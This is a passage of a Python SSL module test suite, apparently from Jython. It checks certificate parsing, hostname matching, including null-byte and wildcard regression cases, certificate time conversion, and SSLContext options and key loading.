self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
@unittest.skipIf(support.is_jython, "Jython does not have _ssl, therefore this test needs to be rewritten")
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# socket.error raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with closing(ssl.wrap_socket(s)) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegexp(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
if support.get_java_version() < (1, 9):
# Possible FIXME similar issue as seen in
# test_load_cert_chain - apparently this RSA 1024 cert is too weak and gets a
# java.security.KeyStoreException: Key protection algorithm not found before the
# ValueError raised on earlier versions of Java;
# but we need to confirm this is truly the case on Java 9
with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s:
self.assertRaisesRegexp(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = u'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in subsequent fragments
# are supported.
idna = u'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, u'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(socket.socket()) as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
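# DefaultVerifyPaths is a namedtuple; the six fields counted above should be
# cafile, capath, openssl_cafile_env, openssl_cafile, openssl_capath_env and
# openssl_capath.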
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
# TODO: Jython needs better ASN.1 support, though it's not clear there's much use for it
# val = ssl._ASN1Object.fromnid(129)
# self.assertEqual(val, expected)
# self.assertIsInstance(val, ssl._ASN1Object)
# self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
# with self.assertRaisesRegexp(ValueError, "unknown NID 100000"):
# ssl._ASN1Object.fromnid(100000)
# for i in range(1000):
# try:
# obj = ssl._ASN1Object.fromnid(i)
# except ValueError:
# pass
# else:
# self.assertIsInstance(obj.nid, int)
# self.assertIsInstance(obj.shortname, str)
# self.assertIsInstance(obj.longname, str)
# self.assertIsInstance(obj.oid, (str, type(None)))
#
# val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
# self.assertEqual(val, expected)
# self.assertIsInstance(val, ssl._ASN1Object)
# self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
# self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
# expected)
# with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"):
# ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
@unittest.skipIf(support.is_jython, "Currently not supported")
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
if support.get_java_version() < (1, 9):
# Possible FIXME we may be skipping this test on Java 9 unnecessarily.
# CERTFILE as generated uses RSA 1024, which is considered too weak.
# This may be why this raises an error on Java 9:
# java.security.KeyStoreException: Key protection algorithm not found:
# java.security.KeyStoreException: Certificate chain is not valid
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(IOError) as cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegexp(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegexp(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegexp(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8'))
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(IOError) as cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError):
ctx.load_verify_locations(u'')
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read().decode("ascii")
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read().decode("ascii")
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegexp(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata=u"broken")
with self.assertRaisesRegexp(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(support.is_jython, "Not yet supported on Jython")
